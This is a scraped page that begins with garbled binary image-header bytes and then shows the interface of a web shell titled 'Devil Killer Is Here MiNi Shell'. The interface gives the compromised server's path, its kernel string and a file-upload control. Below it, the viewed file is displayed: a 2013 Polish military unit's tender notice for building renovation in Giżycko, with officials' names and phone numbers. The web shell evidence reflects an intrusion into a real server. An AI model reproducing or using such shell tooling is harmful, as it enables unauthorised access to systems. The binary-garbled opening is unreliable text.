JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130828/346574-N-2013.html

<p class="kh_header"><b>Giżycko: Robota budowlana w zakresie konserwacji budynku nr 3 JW. 3797 w Giżycku przy al. 1 Maja 11, polegająca na częściowej wyminie stolarki okiennej i drzwiowej, okładzin ściennych i podłogowych oraz malowaniu wewnętrznym.</b><br>
<b>Numer ogłoszenia: 346574 - 2013; data zamieszczenia: 28.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4352 , ul. Nowowiejska 20, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 46 02, faks 87 429 46 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.24wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Robota budowlana w zakresie konserwacji budynku nr 3 JW. 3797 w Giżycku przy al. 1 Maja 11, polegająca na częściowej wyminie stolarki okiennej i drzwiowej, okładzin ściennych i podłogowych oraz malowaniu wewnętrznym..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Roboty remontowe na parterze:1. Rozebranie okładziny ścian z płytek glazury. 2.Zerwanie posadzki z tworzyw sztucznych PCV.3.Wykucie z muru drzwi drewnianych o powierzchni do 2m2. 4.Wywóz gruzu samochodami samowyładowczymi na odległość do 5km. 5.Wykonanie warstwy wyrównawczej polimerowo-cementowej gr.10-15mm pod posadzkę z wykładziny PCV. 6.Ułożenie posadzki z wykładziny z tworzyw sztucznych z wywinięciem 10cm na ścianę, wykładzina PCV obiektowa, antystatyczna, homogeniczna o stopniu ścieralności klasa V grupa P, antypoślizgowość R9, trudnozapalność kl.BFL-S1, klasa zastosowania 20-34-43 kolor i wzór do uzgodnienia z Inwestorem, grubości 2mm. 7.Zgrzewanie wykładzin PCV. 8.Zamocowanie listwy ostrzegawczej na posadzce w miejscy obniżenia posadzki. 9.Wykonanie tynku ręcznego kat. III na ścianach w miejscu po skuciu glazury. 10.Osadzenie drzwi płytowych jednoskrzydłowych pełnych z klamką, dwoma zamkami wpuszczanymi patentowymi i plombowniczką kolor i wzór do uzgodnienia z Inwestorem o wym. 0,90x2,00m -2szt. 11.Montaż przepierzenia aluminiowego wewnętrznego o wymiarach 2,156x3,483m z drzwiami wahadłowymi dwuskrzydłowymi o wymiarach 1,156 x 2,250m z dwoma naświetlami bocznymi, w górnej części przeszklone, natomiast w dolnej części wypełnione panelem pełnym. Kolor biały. Drzwi wyposażone w samozamykacz podłogowy, dwa zamki z wkładką patentową, plombowniczkę oraz pochwyty. 12.Wykonanie warstwy wyrównawczej polimerowo-cementowej gr.10-15mm pod okładzinę ścienną z PCV. 13.Wykonanie okładziny ściennej z wykładziny homogenicznej gr.1,3mm, mającej zabezpieczenie poliuretanowe, o klasie odporności EN 13501-1, odporności chemicznej EN 423 kolor i wzór do uzgodnienia z Inwestorem. 14.Zgrzewanie wykładziny ściennej. 15.Osadzenie parapetów z konglomeratu o dł.130cm, gr.3cm i szer.50cm- szt.3. 16.Zeskrobanie i zmycie starej farby z powierzchni sufitów w pomieszczeniach o powierzchni do 5m2. 17.Zeskrobanie i zmycie starej farby z powierzchni sufitów w pomieszczeniach o powierzchni ponad 5m2. 18.Zeskrobanie i zmycie starej farby z powierzchni ścian w pomieszczeniach o powierzchni do 5m2. 19.Zeskrobanie i zmycie starej farby z powierzchni ścian w pomieszczeniach o powierzchni ponad 5m2. 20.Skasowanie zacieków wykwitów na ścianach. 21.Ługowanie starej farby olejnej - lamperii z powierzchni ścian. 22.Wykonanie jednowarstwowej gładzi gipsowej na powierzchni ścian i sufitów. 23.Malowanie ścian i sufitów farbami emulsyjnymi białymi. 24.Malowanie dwukrotne z jednokrotnym szpachlowaniem ścian farbami poliwinylowymi na wysokość 2m - lamperie. 25.Malowanie jednokrotne farbami olejnymi ościeżnic metalowych. 26.Demontaż, przewóz oraz montaż kompletu unitu stomatologicznego wraz z podłączeniem do instalacji kanalizacyjnej, wodociągowej i elektrycznej oraz podłączenie przewodów sprężonego powietrza. Sprawdzenie poprawność działania wszystkich urządzeń oraz próbne ich uruchomienie. Do wyceny przyjąć jedynie koszty demontażu i montażu bez ceny unitu. Roboty winne być wykonane przez specjalistyczną firmę. 27.Demontaż, przewóz i ponowny montaż sprężarki - bez kosztu materiału - sprężarka i przewód inwestora. 28.Demontaż baterii umywalkowej. 29.Wykonanie izolacji z otulin poliuretanowych fi 50 o długości 7,5m i grubości izolacji 9mm. 30.Osadzenie baterii zmywakowej ściennej Dn 15mm. 31.Osadzenie baterii umywalkowej Dn 15mm. 32.Dodatki za podejścia dopływowe w rurociągach stalowych do baterii o połączeniu sztywnym Dn15mm. 33.Rurociągi z rur stalowych o połączeniach gwintowanych na ścianach Dn 15mm - podwójnie ocynkowanych. 34.Montaż zaworu kulowego fi 15mm. 35.Płukanie instalacji wodociągowej. 36.Próba szczelności instalacji wodociągowej o średnicy do 65mm 37.Dezynfekcja rurociągów sieci wodociągowej. 38.Badanie bakteriologiczne wody. 39.Demontaż rurociągu kanalizacji z PCV fi 50mm. 40.Demontaż umywalki.41.Rurociągi z PCV na ścianach łączone metodą wciskaną fi 50mm. 42. Dodatek za podejścia odpływowe metoda wciskaną fi 50mm. 43. Osadzenie zlewozmywaka dwukomorowego ze stali nierdzewnej. 44.Osadzenie umywalki porcelanowej z syfonem ruchomym. 45.Montaż półpostumentu pod umywalkę. 46.Przebicie otworu w stropie do podłączenia kanalizacji sanitarnej do unitu. 47.Demontaż zaworów gwintowanych grzejnikowych fi 15mm. 48.Demontaż grzejników żeliwnych członowych o pow. ogrzewalnej do 5,0m2. 49.Demontaż grzejnika stalowego 3-płytowego. 50.Osadzenie grzejnika 3-płytowego o wys.60cm i dł. 100cm i mocy 1400W. 51.Osadzenie grzejnika 3-płytowego o wys.60cm i dł. 120cm i mocy 1680W. 52.Osadzenie zaworów grzejnikowych termostatycznych fi 15mm. 53.Osadzenie głowic termostatycznych. 54.Demontaż opraw świetlówkowych z rastrem z tworzyw sztucznych lub metalowych. 55.Osadzenie osprzętu modułowego, wyłącznik nadprądowy 1 biegunowy S301 B16. 56.Osadzenie dodatkowego wyposażenia rozdzielnic modułowych - szyna łączeniowa 3-biegunowa. 57.Wykucie bruzd dla przewodów wtynkowych i rur ścianach. 58.Przebicie otworów w ścianach i stropach, długość przebicia do 2cegieł fi 25mm. 59.Ułożenie przewodów kabelkowych p.t. układanych w gotowych bruzdach o przekroju do 7,5mm2 YDYp 3x2,5 750V. 60.Ułożenie przewodów kabelkowych p.t. układanych w gotowych bruzdach o przekroju do 7,5mm2 YDYp 3x1,5 750V. 61.Ułożenie przewodów kabelkowych p.t. układanych w gotowych bruzdach o przekroju do 12,5mm2 YDY 5x2,5 750V. 62.Przygotowanie podłoża pod osprzęt instalacyjny - ślepe otwory pod mocowanie na zaprawie cementowej lub gipsowej w cegle. 63.Osadzenie puszek podtynkowych pojedynczych fi 60. 64.Osadzenie łącznika p.t. 10A 250V 1-biegunowego nf 501. 65.Gniazda instalacyjne wtyczkowe ze stykiem ochronnym, p.t., 2-biegunowe 10A 2,5mm2 przelotowe podwójne. 66.Gniazda instalacyjne wtyczkowe ze stykiem ochronnym, p.t., 3-biegunowe 63A 16mm2 metalowe z uziemieniem. 67.Osadzenie łącznika n.t. 10A, 250V 1-biegunowego WNt-1A. 68.Montaż oświetlenia przykręcanego, świetlówkowego do 40W - 2x40TLD36 z odbłyśnikiem. 69.Osadzenie wentylatora ściennego mechanicznego. 70.Przebicie otworu w ścianie z cegły gr. 2+1.2 cegły o średnicy 100cm. 71.Zaprawienie bruzd o szerokości do 50mm. 72.Sprawdzenie i pomiar obwodu elektrycznego nn, obwód 1-fazowy. 73.Sprawdzenie i pomiar obwodu elektrycznego nn, obwód 3-fazowy. 74.Wykonanie badań i pomiarów instalacji uziemiającej, piorunochronnej i skuteczności zerowania, pomiar pierwszy i każdy następny. Roboty remontowe na klatce schodowej: 1.Wykucie z muru ościeżnic i drzwi drewnianych o powierzchni ponad 2m2. 2.Wykucie z muru okien drewnianych o powierzchni ponad 2m2. 3.Wykucie z muru okien drewnianych o powierzchni do 2m2. 4.Wkucie z muru parapetów lastrykowych. 5.Rozebranie obróbek blacharskich - parapetów z blachy nie nadającej się do użytku.  6.Wywóz elementów metalowych pochodzących z rozbiórki samochodami skrzyniowymi do magazynu SOI w Giżycku na odległość do 1km. 7.Wykucie z muru ościeżnic i drzwi drewnianych o powierzchni do 2m2. 8.Wykucie z muru ościeżnic i drzwi drewnianych o powierzchni ponad 2m2. 9.Zerwanie posadzki z tworzyw sztucznych. 10.Zerwanie posadzek z płytek z gresu na spocznikach i podestach. 11.Rozebranie posadzek z lastryka na ostatnich stopniach schodowych - podestach. 12.Zerwanie cokolików schodowych. 13.Demontaż balustrady schodowej drewnianej. 14.Demontaż pochwytów ze złożeniem na odkład do ponownego montażu na innej wyższej wysokości. 15.Wywóz gruzu samochodami samowyładowczymi na odległość do 5km. 16.Wykonanie pasów tynków kat. III na ścianach po skuciu cokolików na klatkach schodowych. 17.Osadzenie drzwi stalowych jednoskrzydłowych wraz z ościeżnicą, klamką, dwoma zamkami wpuszczanymi patentowymi i plombowniczką, kolor RAL 8007 wzór do 
uzgodnienia z Inwestorem o wym. 0,9x2,00m - 10szt. 18.Osadzenie drzwi aluminiowych jednoskrzydłowych o odporności ogniowej EI 30 
wraz z ościeżnicą, klamką, dwoma zamkami wpuszczanymi patentowymi i 
plombowniczką kolor i wzór do uzgodnienia z Inwestorem o wym.1,00x2,00m -
2szt,  0,8x2,0m - 2szt, 0,9x2,0m - 2szt. 19.Osadzenie drzwi stalowych jednoskrzydłowych klasy C i ognioodpornych EI 30 o wym.100x200cm w kolorze białym, wyposażone w dwa zamki antywłamaniowe klasy C oraz klamkę oraz plombowniczkę - 1szt. 20.Osadzenie drzwi dwuskrzydłowych, aluminiowych, wahadłowych, wewnętrznych w kolorze białym, wypełnione w dolnej części panelem pełnym, górna część przeszklona szkłem bezbarwnym. Drzwi wyposażone w samozamykacz podłogowy, dwa zamki z wkładką patentową, plombowniczkę i pochwyty, o wymiarach 1,50x2,07m - 4szt. 21.Osadzenie drzwi aluminiowych dwuskrzydłowych zewnętrznych ciepłych wraz z  ościeżnicą, klamką i dwoma zamkami wpuszczanymi patentowymi kolor i wzór do uzgodnienia z Inwestorem o wym.1,45x2,50m -1szt. 22.Osadzenie okna PCV dwuskrzydłowego rozwieranego i rozwierano-uchylnego 234x127cm w kolorze białym z profila pięciokomorowego, z szybą zespoloną o właściwościach termicznych K< 1.1 ze szprosami - 1szt. 23.Osadzenie okien PCV jednoskrzydłowych rozwierano-uchylnych 173x70cm w kolorze białym z profila pięciokomorowego, z szybą zespoloną o właściwościach termicznych K 1.1 ze szprosami - 2szt. 24.Osadzenie parapetów zewnętrznych z blachy ocynkowanej gr.0,55mm. 25.Osadzenie parapetów wewnętrznych z konglomeratu gr.3cm szer.20cm i dł. 70cm - 2szt. 26.Osadzenie parapetów wewnętrznych z konglomeratu gr.3cm szer.50cm i dł. 135cm - 1szt. 27.Zeskrobanie i zmycie starej farby z powierzchni ścian w pomieszczeniach o powierzchni ponad 5m2. 28.Zeskrobanie i zmycie starej farby z powierzchni sufitów i biegów w pomieszczeniach o powierzchni ponad 5m2.29.Ługowanie starej farby olejnej - lamperie. 30.Wykonanie gładzi gipsowej jednowarstwowej na ścianach, sufitach, biegach i spocznikach. 31.Malowanie ścian klatek schodowych 2x farba emulsyjną.
32.Malowanie sufitów, biegów, spoczników oraz czoła biegów klatek schodowych 2x farba emulsyjną. 33.Malowanie rur o średnicy do 5cm 1x farba olejną.
34.Jednokrotne malowanie farba olejną grzejników z rur żebrowanych. 35.Demontaż i ponowny montaż grzejników z rur żebrowanych o długości do 1m - bez ceny grzejników. 36.Demontaż i ponowny montaż grzejników z rur żebrowanych o długości do 2m - bez ceny grzejników. 37.Opalanie farby olejnej z powierzchni drzwi i krat stalowych. 38.Malowanie 2x farba olejną krat i drzwi stalowych. 39.Przygotowanie podłoża poprzez wyrównanie powierzchni stopni schodowych. 40.Obłożenie schodów gresem antypoślizgowym ryflowanym o wym.30x30cm metodą kombinowaną kolor i wzór do uzgodnienia z Inwestorem. 41.Przygotowanie podłoża poprzez wyrównanie powierzchni spoczników i podestów. 42.Obłożenie spoczników i podestów gresem o wym.30x30cm metodą kombinowaną kolor i wzór do uzgodnienia z Inwestorem. 
43.Ułożenie cokolików o wys. 15cm z płytek terakotowych kolor i wzór do uzgodnienia z Inwestorem. 44.Osadzenie pochwytów schodowych pochodzących z rozbiórki na wysokości 115cm materiał pochodzący z rozbiórki. 45.Osadzenie balustrady schodowej stalowej, słupki z profila zamkniętego 30x30mm grubość ścianki 2mm, poprzeczki z płaskownika 40x12mm, poręcze drewniane. Balustrady dwukrotnie malowane farbą olejną i zabezpieczone antykorozyjnie. 46.Demontaż opraw żarowych z kloszem kulistym zawieszanym. 47.Montaż opraw świetlówkowych z podłączeniem, przykręceniem 2x40W, końcowe W2xTLD36 z odbłyśnikiem aluminiowym.  Lokalizacja robót Roboty realizowane będą w kompleksie wojskowym zamkniętym znajdującym się 
w Giżycku przy al. 1 Maja 11. Warunki organizacyjno- techniczne Zamawiający przewiduje możliwość dokonania wizji lokalnej miejsca inwestycji w terminie od 30.08.2013r. do 06.09.2013r. Wykonawca zobowiązany jest do wcześniejszego uzgodnienia terminu wizji lokalnej z Kierownikiem Sekcji Obsługi Infrastruktury Panem Bogusławem Borowiec tel. 87 429-47-67 lub bądź z z-cą Panem Zdzisławem Pomichowskim. Koszt takiej wizyty ponosi Wykonawca. Zamawiający będzie wymagał, aby Wykonawca, którego oferta zostanie uznana za najkorzystniejszą w przedmiotowym postępowaniu, najpóźniej w dniu podpisania umowy ustanowił kierownika budowy robót posiadającego uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 roku - Prawo budowlane oraz dostarczy dowód jego przynależności do Izby Inżynierów Budownictwa. Realizacja robót w godzinach 700-1500 istnieje możliwość pracy do godziny 1800 w dniach poniedziałek- piątek oraz do godz.1500 w sobotę po uzgodnieniu z Dowódcą Jednostki. Roboty będą prowadzone w czynnym zakładzie.
Wykonawca robót kierownik budowy w pełni odpowiada za bezpieczeństwo i higienę pracy w miejscu realizacji robót, oraz za zachowanie bezpieczeństwa pożarowego.
Wykonawca zobowiązany będzie do pokrycia kosztów poboru energii elektrycznej, poboru wody i odprowadzenia ścieków związanych z realizacją robót i potrzebami socjalnymi. Sposób rozliczenia został określony we wzorze umowy. wykonawca wyznaczy koordynatora do spraw BHP, który będzie współpracował z Inspektorem BHP wskazanym przez Dowódcę JW. 3797 p. Krzysztof HOFFMANN, tel. nr 87-429-43-25 wykonawca w ciągu 3 dni od podpisania umowy przekaże Inspektorowi BHP wskazanym przez Dowódcę JW. 3797, oświadczenie o treści zgodnej z załącznikiem nr 2 do umowy wraz z wykazem pracowników realizujących zadanie objęte niniejsza umową..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium zgodnie z art. 45 ustawy pzp. 1.1.Przystępując do postępowania każdy z Wykonawców zobowiązany jest do wniesienia wadium w wysokości 4 000,00 zł. (słownie: cztery tysiące złoty).
1.2. Wadium musi być wniesione przed upływem terminu składania ofert.
1.3. Wadium może być wnoszone w jednej lub w kilku następujących formach pieniądzu, poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo-Kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz.U. Nr 109, poz. 1158, z późn. zm.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania niezbędnej wiedzy i doświadczenia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania niezbędnym potencjałem technicznym do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania osobami zdolnymi do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia, jeżeli przedłoży opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż 100 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
